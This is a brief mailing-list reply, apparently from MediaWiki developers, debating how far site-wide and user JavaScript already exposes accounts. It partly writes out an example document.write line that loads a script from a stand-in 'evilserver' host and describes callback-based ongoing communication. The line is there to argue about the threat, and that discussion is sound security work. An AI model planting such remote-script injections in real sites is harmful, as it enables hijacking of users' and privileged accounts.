On 9/4/07, Domas Mituzas <midom.lists(a)gmail.com> wrote:
By not seeing this, you guys confirm that this should
not be enabled ;-)
Domas, it seems you're out of touch with the actual current behavior.
Right now anyone that can edit the site wide scripts can insert a
document.write('<script
src="http://evilserver.comr.com... and the
script loaded as a result of that can then have ongoing communication
with the user by itself inserting more script tags, which call a a
callback function with the result data.
So you've made a case for limiting control of the proxy functionality
to sysops... but not more than that.
No, it applies
to all user scripts. I doubt that every user who is
including
them in their profile is doing a security audit of the JavaScript.
Only if user is
including them in his profile. Other users can't
include anything into user's profile.
Any sysop can. Any sysop can also edit the site wide, or throw a
script into MediaWiki ns thus making it available withjs
And if you concern is "wikipedia account integrity" you're wrong to
dismiss userscripts. Some are very very popular and are used by many
accounts with elevated rights, for example:
http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/User:Lupin/…